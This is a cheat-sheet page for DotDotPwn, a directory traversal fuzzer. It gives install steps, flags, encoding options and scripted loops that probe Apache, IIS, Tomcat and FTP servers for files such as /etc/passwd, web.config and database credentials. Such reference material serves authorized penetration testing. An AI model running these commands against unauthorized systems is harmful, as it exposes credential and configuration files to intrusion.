Pular para o conteúdo
1337skills 1337skills - Folhas de Dicas

DotDotPwn

Overview

DotDotPwn is a comprehensive directory traversal fuzzer designed to test web servers and applications for path traversal vulnerabilities. It supports multiple traversal patterns, encoding methods, and protocol variations. DotDotPwn is effective for testing various platforms including Apache, IIS, and custom web applications, making it a valuable tool for vulnerability assessment and penetration testing.

The tool systematically tests different traversal sequences, encoding techniques, and protocols to identify path traversal weaknesses that could allow unauthorized access to sensitive files.

Installation

Install via apt (Kali Linux/Debian)

sudo apt-get update
sudo apt-get install dotdotpwn

From source

git clone https://github.com/wireghoul/dotdotpwn.git
cd dotdotpwn
perl dotdotpwn.pl -h

Perl dependencies

# Install required Perl modules
sudo apt-get install libwww-perl
sudo apt-get install libio-socket-ssl-perl

# Or via cpan
cpan IO::Socket::SSL
cpan LWP::UserAgent

Verify installation

perl dotdotpwn.pl --version
perl dotdotpwn.pl --help
which dotdotpwn  # If installed as symlink

Basic Usage

CommandDescription
perl dotdotpwn.pl -h target.com -t httpTest HTTP for directory traversal
perl dotdotpwn.pl -h target.com -t ftpTest FTP for directory traversal
perl dotdotpwn.pl -h target.com -p 8080 -t httpTest custom port
perl dotdotpwn.pl -h target.com -u /file.txt -t httpTest specific URL path

Common Traversal Patterns

HTTP traversal tests

# Basic HTTP traversal test
perl dotdotpwn.pl -h example.com -t http

# Test with verbose output
perl dotdotpwn.pl -h example.com -t http -v

# Test specific port
perl dotdotpwn.pl -h example.com -p 8080 -t http

# Test with custom URL
perl dotdotpwn.pl -h example.com -u /download.php -t http

FTP traversal tests

# Test FTP server
perl dotdotpwn.pl -h ftp.example.com -t ftp

# FTP on non-standard port
perl dotdotpwn.pl -h ftp.example.com -p 2121 -t ftp

# Test with credentials
perl dotdotpwn.pl -h ftp.example.com -t ftp -U user -P password

TFTP and other protocols

# Test TFTP
perl dotdotpwn.pl -h example.com -t tftp

# Test HTTP via HTTPS
perl dotdotpwn.pl -h example.com -p 443 -t https

Encoding Methods

EncodingCommandDescription
No encoding-e 0Plain ../ patterns
URL encoding-e 1%2e%2e%2f patterns
Double encoding-e 2%252e%252e%252f patterns
UTF-8 encoding-e 3UTF-8 encoded traversal
Backslash-e 4Windows-style backslash
All encodings-e aTest all encoding methods

Testing different encodings

# Test plain traversal
perl dotdotpwn.pl -h example.com -e 0 -t http

# Test URL encoding
perl dotdotpwn.pl -h example.com -e 1 -t http

# Test double encoding
perl dotdotpwn.pl -h example.com -e 2 -t http

# Test UTF-8 encoding
perl dotdotpwn.pl -h example.com -e 3 -t http

# Test all encodings
perl dotdotpwn.pl -h example.com -e a -t http -v

Advanced Options

OptionUsageDescription
-m-m 1Web server type (1=Apache, 2=IIS, 3=Tomcat, etc.)
-d-d 5Traversal depth (number of ../)
-f-f /etc/passwdSpecific file to look for
-c-c .phpCustom extension filter
-s-sSSL/HTTPS support
-o-o results.txtOutput file
-x-x 5Timeout in seconds

Custom file targets

# Look for /etc/passwd
perl dotdotpwn.pl -h example.com -f /etc/passwd -t http

# Look for Windows system files
perl dotdotpwn.pl -h example.com -f windows/win.ini -t http

# Look for web server config
perl dotdotpwn.pl -h example.com -f etc/apache2/apache2.conf -t http

# Look for application files
perl dotdotpwn.pl -h example.com -f app/config/database.yml -t http

Custom depths and patterns

# Shallow traversal (few ../ sequences)
perl dotdotpwn.pl -h example.com -d 3 -t http

# Deep traversal (many ../ sequences)
perl dotdotpwn.pl -h example.com -d 10 -t http

# Custom extension
perl dotdotpwn.pl -h example.com -c .asp -t http

# Multiple extensions
perl dotdotpwn.pl -h example.com -c .php,.jsp,.asp -t http

Output and Results

Save results to file

# Verbose output to file
perl dotdotpwn.pl -h example.com -t http -o results.txt

# Review findings
cat results.txt

# Extract successful paths
grep "VULNERABLE\|SUCCESS\|FOUND" results.txt

Parsing results

# Get only vulnerable URLs
perl dotdotpwn.pl -h example.com -t http | grep -i "vulnerable"

# Count potential vulnerabilities
perl dotdotpwn.pl -h example.com -t http | grep -c "FOUND\|SUCCESS"

# Extract file paths
perl dotdotpwn.pl -h example.com -t http | grep -oP '/[^/].*'

Real-World Scenarios

Web application assessment

# Full assessment with all encoding methods
perl dotdotpwn.pl -h target.com -u /download.php -t http -e a -v

# Test multiple paths
for path in /download /file /get /download.php; do
  echo "[*] Testing path: $path"
  perl dotdotpwn.pl -h target.com -u "$path" -t http -e a
done

# Save comprehensive results
perl dotdotpwn.pl -h target.com -t http -e a -o assessment_results.txt

FTP server assessment

# Test FTP with multiple encodings
perl dotdotpwn.pl -h ftp.target.com -t ftp -e a -v

# Test with credentials
perl dotdotpwn.pl -h ftp.target.com -t ftp -U admin -P password -e a

Specific file targeting

# Look for sensitive files
declare -a files=("/etc/passwd" "web.config" "config.php" "settings.xml")
for file in "${files[@]}"; do
  echo "[*] Looking for: $file"
  perl dotdotpwn.pl -h example.com -f "$file" -t http -e a
done

Multiple depth testing

# Test various traversal depths
for depth in 3 5 7 10 15; do
  echo "[*] Testing depth: $depth"
  perl dotdotpwn.pl -h example.com -d $depth -t http -v
done

Server-Specific Testing

Apache testing

# Test Apache specifically
perl dotdotpwn.pl -h apache.target.com -m 1 -t http

# Look for Apache config
perl dotdotpwn.pl -h apache.target.com -f etc/apache2/apache2.conf -t http

# Test for .htaccess
perl dotdotpwn.pl -h apache.target.com -f .htaccess -t http

IIS testing

# Test IIS specifically
perl dotdotpwn.pl -h iis.target.com -m 2 -t http

# Look for web.config
perl dotdotpwn.pl -h iis.target.com -f windows/web.config -t http

# IIS with backslash encoding
perl dotdotpwn.pl -h iis.target.com -e 4 -t http

Tomcat testing

# Test Tomcat specifically
perl dotdotpwn.pl -h tomcat.target.com -m 3 -t http

# Look for Tomcat configuration
perl dotdotpwn.pl -h tomcat.target.com -f conf/server.xml -t http

Troubleshooting

Connection issues

# Test connectivity first
ping target.com
nc -zv target.com 80

# Use timeout option
perl dotdotpwn.pl -h target.com -t http -x 10

# Check if SSL is needed
perl dotdotpwn.pl -h target.com -p 443 -s -t http

No results found

# Try verbose mode to see what's being tested
perl dotdotpwn.pl -h target.com -t http -v

# Test with specific path
perl dotdotpwn.pl -h target.com -u /download.php -t http -v

# Try all encoding methods
perl dotdotpwn.pl -h target.com -e a -t http -v

Permission issues

# Check Perl module installation
perl -e "use LWP::UserAgent; print 'OK\n'"

# Reinstall modules if needed
cpan -i IO::Socket::SSL
cpan -i LWP::UserAgent

Integration with Other Tools

Chain with vulnerability scanners

# Use DotDotPwn findings in other tools
perl dotdotpwn.pl -h example.com -t http > vulnerable_paths.txt

# Further test with curl
while read path; do
  curl "http://example.com$path"
done < vulnerable_paths.txt

Automated assessment

#!/bin/bash
TARGET="example.com"
ENCODINGS=(0 1 2 3 4)

for encoding in "${ENCODINGS[@]}"; do
  echo "[*] Testing encoding: $encoding"
  perl dotdotpwn.pl -h "$TARGET" -e "$encoding" -t http -o "results_encoding_$encoding.txt"
done

# Combine results
cat results_*.txt | grep -i "vulnerable" > final_results.txt

Best Practices

  • Test all encoding methods, not just plain traversal
  • Try different path depths based on application structure
  • Test multiple protocol types (HTTP, FTP, etc.)
  • Look for specific sensitive files relevant to target application
  • Document all successful traversal paths found
  • Test both standard and non-standard ports
  • Use appropriate timeouts for slow servers
  • Be aware of rate limiting and WAF detection
  • Respect scope and authorization for testing
  • Combine with other vulnerability assessment tools

Resources